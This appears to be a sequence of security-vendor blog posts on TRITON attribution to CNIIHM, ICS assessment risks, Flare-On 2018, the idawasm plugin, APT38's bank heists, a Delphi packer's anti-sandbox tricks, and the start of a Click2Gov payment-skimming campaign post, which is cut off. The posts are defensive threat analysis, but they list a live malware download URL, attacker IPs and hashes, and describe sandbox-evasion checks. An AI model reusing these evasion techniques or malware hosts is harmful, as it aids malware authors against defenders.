Testing, Malware Artifacts, and Malicious Activity Suggests Tie to CNIIHM

Multiple factors suggest that this activity is Russian in origin and associated with CNIIHM.

  • A PDB path contained in a tested file contained a string that appears to be a unique handle or user name. This moniker is linked to a Russia-based person active in Russian information security communities since at least 2011.
    • The handle has been credited with vulnerability research contributions to the Russian version of Hacker Magazine (хакер).
    • According to a now-defunct social media profile, the same individual was a professor at CNIIHM, which is located near Nagatinskaya Street in the Nagatino-Sadovniki district of Moscow.
    • Another profile using the handle on a Russian social network currently shows multiple photos of the user in proximity to Moscow for the entire history of the profile.
  • Suspected TEMP.Veles incidents include malicious activity originating from 87.245.143.140, which is registered to CNIIHM.
    • This IP address has been used to monitor open-source coverage of TRITON, heightening the probability of an interest by unknown subjects, originating from this network, in TEMP.Veles-related activities.
    • It also has engaged in network reconnaissance against targets of interest to TEMP.Veles.
    • The IP address has been tied to additional malicious activity in support of the TRITON intrusion.
  • Multiple files have Cyrillic names and artifacts.


Figure 1: Heatmap of TRITON attacker operating hours, represented in UTC time

Behavior Patterns Consistent with Moscow Time Zone

Adversary behavioral artifacts further suggest the TEMP.Veles operators are based in Moscow, lending some further support to the scenario that CNIIHM, a Russian research organization in Moscow, has been involved in TEMP.Veles activity.

  • We identified file creation times for numerous files that TEMP.Veles created during lateral movement on a target’s network. These file creation times conform to a work schedule typical of an actor operating within a UTC+3 time zone (Figure 1) supporting a proximity to Moscow.


Figure 2: Modified service config

  • Additional language artifacts recovered from TEMP.Veles toolsets are also consistent with such a regional nexus.
    • A ZIP archive recovered during our investigations, schtasks.zip, contained an installer and uninstaller of CATRUNNER that includes two versions of an XML scheduled task definitions for a masquerading service ‘ProgramDataUpdater.’
    • The malicious installation version has a task name and description in English, and the clean uninstall version has a task name and description in Cyrillic. The timeline of modification dates within the ZIP also suggest the actor changed the Russian version to English in sequential order, heightening the possibility of a deliberate effort to mask its origins (Figure 2).


Figure 3: Central Research Institute of Chemistry and Mechanics (CNIIHM) (Google Maps)

CNIIHM Likely Possesses Necessary Institutional Knowledge and Personnel to Create TRITON and Support TEMP.Veles Operations

While we know that TEMP.Veles deployed the TRITON attack framework, we do not have specific evidence to prove that CNIIHM did (or did not) develop the tool. We infer that CNIIHM likely maintains the institutional expertise needed to develop and prototype TRITON based on the institute’s self-described mission and other public information.

  • CNIIHM has at least two research divisions that are experienced in critical infrastructure, enterprise safety, and the development of weapons/military equipment:
    • The Center for Applied Research creates means and methods for protecting critical infrastructure from destructive information and technological impacts.
    • The Center for Experimental Mechanical Engineering develops weapons as well as military and special equipment. It also researches methods for enabling enterprise safety in emergency situations.
  • CNIIHM officially collaborates with other national technology and development organizations, including:
    • The Moscow Institute of Physics and Technology (PsyTech), which specializes in applied physics, computing science, chemistry, and biology.
    • The Association of State Scientific Centers “Nauka,” which coordinates 43 Scientific Centers of the Russian Federation (SSC RF). Some of its main areas of interest include nuclear physics, computer science and instrumentation, robotics and engineering, and electrical engineering, among others.
    • The Federal Service for Technical and Export Control (FTEC) which is responsible for export control, intellectual property, and protecting confidential information.
    • The Russian Academy of Missile and Artillery Sciences (PAPAH) which specializes in research and development for strengthening Russia’s defense industrial complex.
  • Information from a Russian recruitment website, linked to CNIIHM’s official domain, indicates that CNIIHM is also dedicated to the development of intelligent systems for computer-aided design and control, and the creation of new information technologies (Figure 4).


Figure 4: CNIIHM website homepage

Primary Alternative Explanation Unlikely

Some possibility remains that one or more CNIIHM employees could have conducted the activity linking TEMP.Veles to CNIIHM without their employer’s approval. However, this scenario is highly unlikely.

  • In this scenario, one or more persons – likely including at least one CNIIHM employee, based on the moniker discussed above – would have had to conduct extensive, high-risk malware development and intrusion activity from CNIIHM’s address space without CNIIHM’s knowledge and approval over multiple years.
  • CNIIHM’s characteristics are consistent with what we might expect of an organization responsible for TEMP.Veles activity. TRITON is a highly specialized framework whose development would be within the capability of a low percentage of intrusion operators.

ICS Tactical Security Trends: Analysis of the Most Frequent Security Risks Observed in the Field

Introduction

FireEye iSIGHT Intelligence compiled extensive data from dozens of ICS security health assessment engagements (ICS Healthcheck) performed by Mandiant, FireEye's consulting team, to identify the most pervasive and highest priority security risks in industrial facilities. The information was acquired from hands-on assessments carried out over the last few years across a broad range of industries, including manufacturing, mining, automotive, energy, chemical, natural gas, and utilities. In this post, we provide details of these risks, and indicate best practices and recommendations to mitigate the identified risks.

Mandiant ICS Healthchecks

Mandiant ICS Healthchecks and penetration testing engagements include on-site assessments of customers' IT and ICS systems. The ICS Healthcheck consists of workshops and technical reviews. It captures the results in a final report that ranks discovered findings and vulnerabilities by risk using Mandiant’s Risk Rating method. During an onsite workshop with site technical experts, Mandiant develops a technical understanding of the subject control system(s), builds a network diagram of the control system, analyzes for potential vulnerabilities and threats, and assists with prioritizing recommended countermeasures to defend the environment.

Mandiant also collects and reviews packet captures of network traffic from the ICS environment to validate the network diagram constructed in the workshop and to identify any unexpected or undesirable deviations from the intended design. This traffic is also analyzed for evidence of compromise or misconfiguration of the ICS network/system. Mandiant inspects the deployed security technology for vulnerabilities and other architectural risks, such as inappropriately configured firewalls, dual-homed control system devices, and unnecessary connectivity to the business network or the Internet.

NOTE: Findings are discussed at a generalized level to preserve the anonymity of our customers. This post presents a high-level overview and is meant to be an informative first stop for customers interested in common cyber security issues. For more information or to request Mandiant services, please visit our website.

Methodology: Mandiant Risk Rating System

This blog post leverages information from Mandiant ICS Healthchecks, which evaluate cyber security risk in organizations from multiple industries. The rating of critical and high security risk is based on the Mandiant Risk Rating System, which is determined by identifying the exploitability and the impact of a given issue, and cross-referencing the results (Figure 1).


Figure 1: Impact/exploitability graphic

One Third of Security Risks in ICS Environments Ranked High or Critical

We reviewed findings from all of our risk assessments and then categorized and ranked the reported risks as critical or high, medium, low, or informational (Figure 2). At least 33 percent of the security issues we found in ICS organizations were rated of high or critical risk. This means they were most likely to allow adversaries to readily gain control of target systems and potentially compromise other systems or networks, cause disruption of services, disclose unauthorized information, or result in other significant negative consequences. We suggest immediate remediation for critical risks, and quick action to remediate high security risks.


Figure 2: Risk assessment distribution

Most Common High and Critical Security Risks in ICS Environments

FireEye iSIGHT Intelligence organized the critical and high security risks identified during Mandiant ICS Healthchecks into nine unique categories (Table 1). The three most common were:

  • Vulnerabilities, Patches, and Updates (32 percent)
  • Identity and Access Management (25 percent)
  • Architecture and Network Segmentation (11 percent)

In most of these cases, basic security best practices would be enough to stop (or at least make it more difficult for) threat actors to target an organization's systems. The implications are vast because specialized malware or actors targeting infrastructure would likely look for these flaws first to exploit throughout the targeted attack lifecycle.


Table 1: Distribution of high and critical security risks in ICS environments

Top Three High and Critical Risks and Recommended Mitigations

Vulnerabilities, Patches, and Updates

Vulnerability, patch, and update management procedures enable organizations to secure off-the-shelf software, hardware, and firmware from known security threats. Known vulnerabilities in ICS environments can be leveraged by threat actors to access the network and move laterally to execute targeted attacks. The following common risks were observed during our engagements:

  • Infrequent procedures for patching and updating control systems:
    • We encountered organizations with no formal vulnerability and patch management programs.
  • Out-of-date firmware, hardware, and operating systems (OS), including:
    • Network devices and systems such as switches, firewalls, and routers.
    • Hardware equipment, including desktop computers, cameras, and programmable logic controllers (PLCs).
    • Unsupported legacy operating systems such as Windows Server 2003, XP, 2000, and NT 4.
  • Unaddressed known vulnerabilities in software applications and equipment where patches are available:
    • We observed outdated firewalls with up to 53 unaddressed vulnerabilities and switches with more than 200 vulnerabilities.
    • System management software that can be exploited using known open source tools.
  • Lack of test environments to analyze patches and updates before implementation.

Mitigations

  • Develop a comprehensive ICS Vulnerability Management Strategy and include procedures to implement patches and updates on key assets. More information is provided by the National Institute for Standards and Technology's (NIST) Guide for ICS Security NIST SP800-82.
  • When patches and updates are no longer provided for key infrastructure, choose one of the two following options:
    • Implement a security perimeter around affected assets, protected by, at minimum, a firewall (industrial protocol inspection/blocking if appropriate) for access control and traffic filtering.
    • Decommission legacy devices that might be exploited to gain access to the network, such as switches.
  • Set up development systems or labs that are representative of the running IT and ICS devices. These systems can often be built from existing spares along with the purchase or loan of additional licenses for human-machine interfaces (HMIs) and configuration software from the system vendor. A development system is an excellent platform to test changes and patches, and on which to perform vulnerability scans without risk to active systems.
Identity and Access Management

The second most common category of security issues identified was related to the flaws in or absence of best practices for handling passwords and credentials. Common weaknesses identified by Mandiant include:

  • Lack of multi-factor authentication for remote access and critical accounts:
    • Users were able to remotely access ICS environments from the corporate network without requiring multi-factor authentication.
  • Lack of a comprehensive and enforced password policy:
    • Weak passwords with insufficient length or complexity used for privileged accounts, ICS user accounts, and service accounts.
    • Passwords were not changed frequently.
    • Passwords were reused for multiple accounts.
  • Prominently displayed passwords:
    • Passwords were written on the chassis of devices.
  • Hard-coded and default credentials in applications and equipment:
    • Mandiant discovered Remote Terminal Units (RTUs) containing default credentials, which are commonly available on the Internet and in the device manuals.
    • A modem contained a backdoor account incorporated by the manufacturer.
  • Commonly used “administrator” accounts.
  • Use of shared credentials.

Mitigations

  • Implement two-factor authentication for all possible users, especially administrative accounts.
  • Avoid keeping written copies of passwords and, if necessary, secure them out of sight with limited access for only authorized users.
  • Enforce password policies that require strong passwords that are regularly modified and cannot be reused. More information is available from SANS.
  • Avoid common, easily guessed user account names such as "operator," "administrator," or "admin." Instead, use uniquely named user accounts for all access.
  • Require administrative users to log in with uniquely named user accounts with strong passwords, tied back to an individual person.
  • Avoid shared accounts when feasible. However, if present, they should be hardened using strong passwords that are stored in an encrypted password manager.
Network Segregation and Segmentation

Of the top three risks identified in this post, weaknesses in network segregation and segmentation are the most important. Lack of segregation from the corporate IT network and within the ICS network allows threat actors opportunities to launch remote attacks against key infrastructure by moving laterally from IT services to ICS environments. Furthermore, it increases the risk of commodity malware spreading to ICS networks where the malware could interact with operational assets. The main risks identified by Mandiant included:

  • Plant systems accessible from the corporate network, either directly or through bridge devices (connected to both networks), such as unused servers, HMIs, historians, or loosely configured shared firewalls. We also found:
    • Unfiltered access to plant servers from corporate networks through, for example, a historian communicating with the distributed control system (DCS).
    • Missing segmentation between ICS and corporate networks.
    • Vulnerabilities in bridge devices (e.g., outdated appliances running vulnerable OS) that can enable lateral movement between networks.
    • Business functions (e.g., data backups and anti-virus updates) running on shared control system networks.
  • Dual-homed systems, both servers and desktop computers.
  • Industrial networks connected directly to the internet.

Mitigations

  • Segment all access to ICS with a network Demilitarized Zone (DMZ), as recommended by both NIST SP 800-82 and IEC (Figure 3):
    • Restrict the number of ports, services, and protocols used to establish communications between the ICS and corporate networks to the least possible to reduce the attack surface.
    • Terminate incoming access for both regular and administrative users first in the DMZ, and then establish another session with connectivity into the ICS network.
    • Place servers (or mirrored servers) that provide ICS data to the corporate network in the DMZ.
    • Use firewalls to filter all network traffic entering or leaving the ICS.
    • Firewall rules should filter both incoming traffic from the corporate network and outgoing traffic from the ICS, and they should only allow the minimum required amount of traffic to pass.
  • Isolate the control networks from the internet. A separate network should be used for internet access through a DMZ, and at no time should a bridged connection be allowed between the two networks.
  • Ensure that independent, regularly patched firewalls are used to separate the corporate network from the DMZ and ICS network, and review firewall rulesets on a regular basis.
  • Identify and redirect any non-control system traffic traversing the industrial network.
  • Eliminate all dual-homed servers and hosts.


Figure 3: Reference architecture for segmentation of enterprise and control system networks

Additional Highlights

Additional common risks were identified from other categories, but with less frequency.

Network Management and Monitoring
  • We identified the lack of Network Security Monitoring, Intrusion Detection, and Intrusion Prevention in organizations, including missing endpoint malware protection, leaving unused ports active, and having limited visibility into ICS networks. We recommend the following best practices:
    • A comprehensive network security monitoring strategy should be defined and implemented at the ICS level as part of an overarching ICS security program. Special attention should be placed on monitoring network segments where external connectivity occurs:
  • Implement or increase centralized system and network logging to provide visibility across the entire enterprise (IT and ICS). Monitor logs for anomalous behavior. Consider implementing additional host or network-based security controls that generate alerts or reject traffic based on anomalous or suspicious behavior.
  • Install a centrally managed anti-malware solution on all ICS and ICS DMZ hosts. Ensure that signature and application updates are deployed in a timely manner.
  • Explore alternatives for the deployment of an advanced endpoint protection solution that provides detection/prevention for malware and malicious activities that do not rely on signature-based detection methods.
  • Develop procedures to identify and shut down network ports when not in use.
Misconfigurations in Firewall Rules

We identified weak firewall rules including "ANY-ANY" configurations, conflicting or overlapping rules, overly permissive conditions allowing access to administrative services, and lack of console connection timeouts. We recommend the following best practices for secure firewall configuration:

  • Filtering rules should only allow access from/to specific source/destination IP addresses and ports.
  • Filter rules should specify a specific network protocol.
  • ICMP filter rules should specify a specific message type.
  • Filter rules should drop network packets instead of rejecting them.
  • Filter rules should perform a specific action and not rely on a default action.
  • Administrative session timeout parameters should be set to terminate those sessions after a predetermined amount of time.
Cyber Security Governance Best Practices

We identified some organizations with limited or absent formal and comprehensive ICS security programs. We highly suggest organizations implement ICS security programs to prioritize the following recommendations:

  • Establish a formal ICS security program with a clearly defined owner, accountability, and governance structure. It should include:
    • Business expectations, policies, and technical standards for ICS security.
    • Guidance on proactive security controls (e.g., implementation of patches and updates, change management, or secure configurations).
    • Incident Response, Disaster Recovery, and Business Continuity plans.
    • ICS security awareness training plans.
  • Develop a Vulnerability Management Strategy following NIST SP800-82, including asset identification and inventory, risk assessment and analysis methodology (with prioritization of critical assets), remediation testing, and deployment guidelines.

Conclusion

This blog post presents a broad picture of the current risks facing industrial organizations as observed during Mandiant ICS Healthchecks. While the trends observed in this research align with risk areas commonly discussed in security conference talks and media reports, this blog draws from dozens of on-site assessments that hold real-life validity.

Our findings indicate that at least one third of the critical and high security risks in ICS are related to vulnerabilities, patches, and updates. Known vulnerabilities continue to represent significant challenges for ICS owners that must oversee the daily operation of thousands of assets in complex industrial environments. It is also relevant to highlight that some of the most common risks we identified could be mitigated with security best practices, such as enforcing a comprehensive password management policy or establishing detailed firewall rules. If you are interested in more information or to request Mandiant services, please visit our website.

2018 Flare-On Challenge Solutions

We are pleased to announce the conclusion of the fifth annual Flare-On Challenge. The numbers are in and we can safely say that this was by far the most difficult challenge we’ve ever hosted. We plan to reduce the difficulty next year, so it may be that the 114 people who solved this year’s challenge solved not only the most difficult Flare-On to date, but the most difficult Flare-On there ever will be. The prize for these amazing and dedicated Reverse Engineers is a magic decoder buckle and coin insert. It can be used to decode and encode secret messages using a pre-shared key. It is based on a crypto system known as a Diana Cipher. They will be shipping soon.

We would like to thank the challenge authors individually for their great puzzles and solutions:

  1. Minesweeper Championship Registration: Nick Harbour (@nickharbour)
  2. Ultimate Minesweeper: Nick Harbour (@nickharbour)
  3. FLEGGO: Moritz Raabe
  4. binstall: Tyler Dean the Malware Machine
  5. Web 2.0: William Ballenthin (@williballenthin)
  6. Magic: Sebastion Vogl
  7. WOW: Ryan Warns
  8. Doogie Hacker: Matt Williams (@0xmwilliams)
  9. leet editr: Michael Bailey
  10. golf: Ryan Warns
  11. malware skillz: Jay Smith
  12. Suspicious Floppy Disk: Nick Harbour (@nickharbour)

And now for the stats. As of 10:00am ET, participation was at an all-time high, with 4,893 registered players and 3,374 players finishing at least one challenge. This year had the least amount of finishers as well with 114.

The U.S. continues to slip further down the ranking in terms of finishers by country. China takes the lead in overall finishers and Singapore is the undisputed champion of per capita finishers with more than one finisher per million people.

All the binaries from this year’s challenge are now posted on the Flare-On website. And here are the solutions written by each challenge author:

  1. SOLUTION #1
  2. SOLUTION #2
  3. SOLUTION #3
  4. SOLUTION #4
  5. SOLUTION #5
  6. SOLUTION #6
  7. SOLUTION #7
  8. SOLUTION #8
  9. SOLUTION #9
  10. SOLUTION #10
  11. SOLUTION #11
  12. SOLUTION #12

FLARE Script Series: Reverse Engineering WebAssembly Modules Using the idawasm IDA Pro Plugin

Introduction

This post continues the FireEye Labs Advanced Reverse Engineering (FLARE) script series. Here, we introduce idawasm, an IDA Pro plugin that provides a loader and processor modules for WebAssembly modules. idawasm works on all operating systems supported by IDA Pro, and can be obtained from the idawasm GitHub project.

Motivation

You may have competed in this year’s Flare-On challenge and reached the fifth level only to discover a new file format: a WebAssembly (“wasm”) module. In order to proceed, you had to reverse engineer the key check logic contained in this binary file for the WebAssembly stack-based virtual machine. But first, you probably learned a bit about wasm:

"Wasm is designed as a portable target for compilation of high-level languages like C/C++/Rust, enabling deployment on the web for client and server applications.
The Wasm stack machine is designed to be encoded in a size- and load-time-efficient binary format. WebAssembly aims to execute at native speed by taking advantage of common hardware capabilities available on a wide range of platforms."

via: WebAssembly

While WebAssembly is a fairly new standard, some tools for analysis already exist:

  • The WebAssembly Binary Toolkit provides the command line tool wasm2wat that translates a .wasm file into the human-readable .wat format, as well as a basic decompiler called wasm2c.
  • The web-based WebAssembly Studio IDE exposes features for extracting .wasm files into interesting formats, including translations to x86-64 produced by the Firefox SpiderMonkey JIT engine.
  • Radare2 can disassemble instructions, though it doesn’t reconstruct control flow graphs just yet.

Unfortunately, few of these tools are interactive or familiar to us. If we could analyze .wasm files in IDA Pro, like we do with .exe and .so files, then we might be better prepared for malware distributed as WebAssembly.

The idawasm IDA Pro plugin is a loader and processor module that enables analysts to review WebAssembly modules using a familiar interface. Let’s take a peek at some of its major features.

Whirlwind Tour of idawasm

Once you’ve installed idawasm, you can load .wasm files into IDA Pro. The "Load a new file" dialog will indicate when the loader module recognizes a WebAssembly module. Currently, the plugin supports the MVP (version 1) release of WebAssembly, as shown in Figure 1.


Figure 1: IDA Pro loading a WebAssembly module

The processor module then gets to work and reconstructs the control flow, which enables IDA’s graph mode. This makes it easy to identify high-level control constructs, such as if statements and while loops. On the FLARE team, we’ve found that when a C program is compiled for WebAssembly, the resulting control flow graphs mirror those of an x86 compilation target. Although the specific instructions differ, our techniques and intuitions we’ve learned for x86 apply to wasm too. Note how easy it is to identify the pair of if statements in Figure 2.


Figure 2: Control flow graph of WebAssembly instructions

In addition to control flow, the processor module parses and renders function names and types using metadata embedded with .wasm files. It also extracts cross-references to global variables, enabling an analyst to “List cross-references” and find code that manipulates interesting values. Of course, all of the elements that idawasm parses can be interactively renamed and commented. Therefore, you can record knowledge about WebAssembly malware samples in .idb files and share them with other analysts.

For example, Figure 3 shows how an analyst has renamed local variables and added comments that explain how the function frame is manipulated during a function prologue.


Figure 3: Annotated WebAssembly in IDA Pro

When the idawasm processor detects that a WebAssembly module was compiled by LLVM, it enables enhanced analysis. LLVM uses primitives provided by the WebAssembly specification to implement a function frame stack in global memory used for mutable function-local variables. In the function prologue, the first few instructions allocate the frame on this global stack, while the epilogue cleans it up prior to return. idawasm automatically finds references to the global frame stack pointer and reconstructs the frame layout of each function. Using this information, the processor updates IDA’s stack frame structures and marks immediate constants as offsets into these structures. This means that many more instruction operands are actually symbols that can be commented and renamed, as shown in Figure 4.


Figure 4: Automated reconstruction of function frame

By convention, WebAssembly compilers emit instructions that reference variables in Single Static Assignment (SSA) form. This is a benefit to browser engines, because code that is already in SSA form is easier to import into analysis systems such as optimizers and JIT engines. Using SSA form is why even the simplest functions have dozens or hundreds of local variables.

But as a human, SSA form is tedious to analyze since we must trace operations across many separate local variables. To help us out, idawasm includes a WebAssembly emulator that can track instructions at a symbolic level. This enables us to collapse a sequence of simple-but-related instructions into a single complex expression.

To use it, we select a region of instructions within a single basic block and run the wasm_emu.py script. The script emulates the instructions, simplifies their effects, and renders the effect to global variables, locals, memory, and the stack. Figure 5 shows how a function’s prologue is simplified to a single global variable update:


Figure 5: wasm_emu.py show effects of function frame allocation

When there are many arithmetic operations, wasm_emu.py often simplifies into a single meaningful expression. For example, Figure 6 shows how 32 instructions boil down into a single XOR across two input bytes:


Figure 6: wasm_emu.py simplifying many instructions to a complex instruction

Conclusion

idawasm is an IDA Pro plugin that enables support for WebAssembly modules via a loader and processor. This lets analysts use a familiar interface to reverse engineer .wasm files and share their work with others. The wasm_emu.py script can also be helpful for understanding the effects of long streams of WebAssembly instructions. Now dealing with this new file format and architecture won’t be as scary, so head on over to the idawasm GitHub project to start using it!

APT38: Details on New North Korean Regime-Backed Threat Group

Today, we are releasing details on the threat group that we believe is responsible for conducting financial crime on behalf of the North Korean regime, stealing millions of dollars from banks worldwide. The group is particularly aggressive; they regularly use destructive malware to render victim networks inoperable following theft. More importantly, diplomatic efforts, including the recent Department of Justice (DOJ) complaint that outlined attribution to North Korea, have thus far failed to put an end to their activity. We are calling this group APT38.

We are releasing a special report, APT38: Un-usual Suspects, to expose the methods used by this active and serious threat, and to complement earlier efforts by others to expose these operations, using FireEye’s unique insight into the attacker lifecycle.

We believe APT38’s financial motivation, unique toolset, and tactics, techniques and procedures (TTPs) observed during their carefully executed operations are distinct enough to be tracked separately from other North Korean cyber activity. There are many overlapping characteristics with other operations, known as “Lazarus” and the actor we call TEMP.Hermit; however, we believe separating this group will provide defenders with a more focused understanding of the adversary and allow them to prioritize resources and enable defense. The following are some of the ways APT38 is different from other North Korean actors, and some of the ways they are similar:

  • We find there are clear distinctions between APT38 activity and the activity of other North Korean actors, including the actor we call TEMP.Hermit. Our investigation indicates they are disparate operations against different targets and reliance on distinct TTPs; however, the malware tools being used either overlap or exhibit shared characteristics, indicating a shared developer or access to the same code repositories. As evident in the DOJ complaint, there are other shared resources, such as personnel who may be assisting multiple efforts.
  • A 2016 Novetta report detailed the work of security vendors attempting to unveil tools and infrastructure related to the 2014 destructive attack against Sony Pictures Entertainment. This report detailed malware and TTPs related to a set of developers and operators they dubbed “Lazarus,” a name that has become synonymous with aggressive North Korean cyber operations.
    • Since then, public reporting attributed additional activity to the “Lazarus” group with varying levels of confidence primarily based on malware similarities being leveraged in identified operations. Over time, these malware similarities diverged, as did targeting, intended outcomes and TTPs, almost certainly indicating that this activity is made up of multiple operational groups primarily linked together with shared malware development resources and North Korean state sponsorship.

Since at least 2014, APT38 has conducted operations in more than 16 organizations in at least 13 countries, sometimes simultaneously, indicating that the group is a large, prolific operation with extensive resources. The following are some details about APT38 targeting:

  • The total number of organizations targeted by APT38 may be even higher when considering the probable low incident reporting rate from affected organizations.
  • APT38 is characterized by long planning, extended periods of access to compromised victim environments preceding any attempts to steal money, fluency across mixed operating system environments, the use of custom developed tools, and a constant effort to thwart investigations capped with a willingness to completely destroy compromised machines afterwards.
  • The group is careful, calculated, and has demonstrated a desire to maintain access to a victim environment for as long as necessary to understand the network layout, required permissions, and system technologies to achieve its goals.
  • On average, we have observed APT38 remain within a victim network for approximately 155 days, with the longest time within a compromised environment believed to be almost two years.
  • In just the publicly reported heists alone, APT38 has attempted to steal over $1.1 billion dollars from financial institutions.

Investigating intrusions of many victimized organizations has provided us with a unique perspective into APT38’s entire attack lifecycle. Figure 1 contains a breakdown of observed malware families used by APT38 during the different stages of their operations. At a high-level, their targeting of financial organizations and subsequent heists have followed the same general pattern:

  1. Information Gathering: Conducted research into an organization’s personnel and targeted third party vendors with likely access to SWIFT transaction systems to understand the mechanics of SWIFT transactions on victim networks (Please note: The systems in question are those used by the victim to conduct SWIFT transactions. At no point did we observe these actors breach the integrity of the SWIFT system itself.).
  2. Initial Compromise: Relied on watering holes and exploited an insecure out-of-date version of Apache Struts2 to execute code on a system.
  3. Internal Reconnaissance: Deployed malware to gather credentials, mapped the victim’s network topology, and used tools already present in the victim environment to scan systems.
  4. Pivot to Victim Servers Used for SWIFT Transactions: Installed reconnaissance malware and internal network monitoring tools on systems used for SWIFT to further understand how they are configured and being used. Deployed both active and passive backdoors on these systems to access segmented internal systems at a victim organization and avoid detection.
  5. Transfer funds: Deployed and executed malware to insert fraudulent SWIFT transactions and alter transaction history. Transferred funds via multiple transactions to accounts set up in other banks, usually located in separate countries to enable money laundering.
  6. Destroy Evidence: Securely deleted logs, as well as deployed and executed disk-wiping malware, to cover tracks and disrupt forensic analysis.


Figure 1: APT38 Attack Lifecycle

APT38 is unique in that it is not afraid to aggressively destroy evidence or victim networks as part of its operations. This attitude toward destruction is probably a result of the group trying to not only cover its tracks, but also to provide cover for money laundering operations.

In addition to cyber operations, public reporting has detailed recruitment and cooperation of individuals in-country to support with the tail end of APT38’s thefts, including persons responsible for laundering funds and interacting with recipient banks of stolen funds. This adds to the complexity and necessary coordination amongst multiple components supporting APT38 operations.

Despite recent efforts to curtail their activity, APT38 remains active and dangerous to financial institutions worldwide. By conservative estimates, this actor has stolen over a hundred million dollars, which would be a major return on the likely investment necessary to orchestrate these operations. Furthermore, given the sheer scale of the thefts they attempt, and their penchant for destroying targeted networks, APT38 should be considered a serious risk to the sector.

Increased Use of a Delphi Packer to Evade Malware Classification

Introduction

The concept of "packing" or "crypting" a malicious program is widely popular among threat actors looking to bypass or defeat analysis by static and dynamic analysis tools. Evasion of classification and detection is an arms race in which new techniques are traded and used in the wild. For example, we observe many crypting services being offered in underground forums by actors who claim to make any malware "FUD" or "Fully Undetectable" by anti-virus technologies, sandboxes and other endpoint solutions. We also see an increased effort to model normal user activity and baseline it as an effective countermeasure to fingerprint malware analysis environments.

Delphi Code to the Rescue

The samples we inspected were carrying the Delphi signature (Figure 1) and were consistent with Delphi code constructs on analyzing with IDR (Interactive Delphi Reconstructor).


Figure 1: Delphi signature in sample

The Delphi programming language can be an easy way to write applications and programs that leverage Windows API functions. In fact, some actors deliberately include the default libraries as a diversion to hamper static analysis and make the application "look legit" during dynamic analysis. Figure 2 shows the forum post of an actor discussing this technique.


Figure 2: Underground forum post of an actor discussing technique

Distribution Campaigns

We have observed many spam campaigns with different themes that drop payloads packed using this packer.

An example is an average swift transfer spam that carries a document file as an attachment (hash: 71cd5df89e3936bb39790010d6d52a2d), which leverages malicious macros to drop the payload. The spam email is shown in Figure 3.


Figure 3: Spam example 1

Another example is an average quotation themed spam that carries an exploit document file as an attachment (hash: 0543e266012d9a3e33a9688a95fce358), which leverages an equation editor vulnerability to drop the payload (Figure 4).


Figure 4: Spam example 2

The documents in the examples fetched a payload from http://5.152.203.115/win32.exe. This turned out to be Lokibot malware.

User Activity Checks

The packer goes to great lengths to ensure that it is not running in an analysis environment. Normal user activity involves many application windows being rotated or changed over a period of time. The first variant of the packer uses GetForegroundWindow API to check for the user activity of changing windows at least three times before it executes further. If it does not see the change of windows, it puts itself into an infinite sleep. The code is shown in Figure 5. Interestingly, some of the publicly available sandboxes can be detected by this simple technique.


Figure 5: Window change check

To confirm user activity, a second variant of the packer checks for mouse cursor movement using GetCursorPos and Sleep APIs, while a third variant checks for system idle state using GetLastInputInfo and GetTickCount APIs.

Extracting Real Payloads from the PE Resources

The original payload is split into multiple binary blobs and stored in various locations inside the resource directory, as shown in Figure 6.


Figure 6: Bitmap resource with encrypted contents

To locate and assemble the real payload bytes, the packer code first directly reads content from a hardcoded resource ID inside the resource section. The first 16 bytes of this form a XOR key used to decrypt rest of the bytes using rolling XOR. The decrypted bytes actually represent an internal data structure, as shown in Figure 7, used by the packer to reference encrypted and obfuscated buffers at various resource IDs.


Figure 7: Structure showing encrypted file information

The packer then reads values from the encrypted buffers, starting from dwStartResourceId to dwStartResourceId+dwNumberOfResources, and brings them to a single location by reading chunks of dwChunkSize. Once the final data buffer is prepared, it starts decrypting it using the same rolling XOR algorithm mentioned previously and the new key from the aforementioned structure, producing the core payload executable. This script can be used to extract the real payload statically.

Classification of Real Families

Many of the unpacked binaries that we were able to extract from the sample set were identified as belonging to the Lokibot malware family. We were also able to identify Pony, IRStealer, Nanocore, Netwire, Remcos, and nJRAT malware families, as well as a coin mining malware family, among others. A distribution of the malware families using the packer is shown in Figure 8. This diversity of malware families implies that many threat actors are using this "crypting" service/tool for their operations, possibly buying it from the developer itself.


Figure 8: Distribution of malware families using packer

Conclusion

Packers and crypter services provide threat actors an easy and convenient option to outsource the workload of keeping their real payloads undetected and unclassified as long as possible. They are regularly finding nifty ways to bypass sandbox environments with anti-analysis techniques; hence, detonating malware samples in a sandbox environment that try to model real user behavior is a safe bet.

FireEye MVX Engine both detects and blocks this activity.

Indicators of Compromise (IOCs)

  • 853bed3ad5cc4b1471e959bfd0ea7c7c
  • e3c421d404c08809dd8ee3365552e305
  • 14e5326c5da90cd6619b7fe1bc4a97e1
  • dc999a1a2c5e796e450c0a6a61950e3f
  • 3ad781934e67a8b84739866b0b55544b
  • b4f5e691b264103b9c4fb04fa3429f1e

Click It Up: Targeting Local Government Payment Portals

FireEye has been tracking a campaign this year targeting web payment portals that involves on-premise installations of Click2Gov. Click2Gov is a web-based, interactive self-service bill-pay software solution developed by Superion. It includes various modules that allow users to pay bills associated with various local government services such as utilities, building permits, and business licenses. In October 2017, Superion released a statement confirming suspicious activity had affected a small number of customers. In mid-June 2018, numerous media reports referenced at least seven Click2Gov customers that were possibly affected by this campaign. Since June 2018, additional victims have been identified in public reporting. A review of public statements by these organizations appear to confirm compromises associated with Click2Gov.

On June 15, 2018, Superion released a statement describing their proactive notification to affected customers, work with a third-party forensic firm (not Mandiant), and deployment of patches to Click2Gov software and a related third-party component. Superion then concluded that there was no evidence that it is unsafe to make payments utilizing Click2Gov on hosted or secure on-premise networks with recommended patches and configurations.

Mandiant forensically analyzed compromised systems and recovered malware associated with this campaign, which provided insight into the capabilities of this new attacker. As of this publication, the discussed malware families have very low detection rates by antivirus solutions, as reported by VirusTotal.

Attack Overview

The first stage of the campaign typically started with the attacker uploading a SJavaWebManage webshell to facilitate interaction with the compromised Click2Gov webserver. Through interaction with the webshell, the attacker enabled debug mode in a Click2Gov configuration file causing the application to write payment card information to plaintext log files. The attacker then uploaded a tool, which FireEye refers to as FIREALARM, to the webserver to parse these log files, retrieve the payment card information, and remove all log entries not containing error messages. Additionally, the attacker used another tool, SPOTLIGHT, to intercept payment card information from HTTP network traffic. The remainder of this blog post dives into the details of the attacker's tactics, techniques, and procedures (TTPs).

SJavaWebManage Webshell

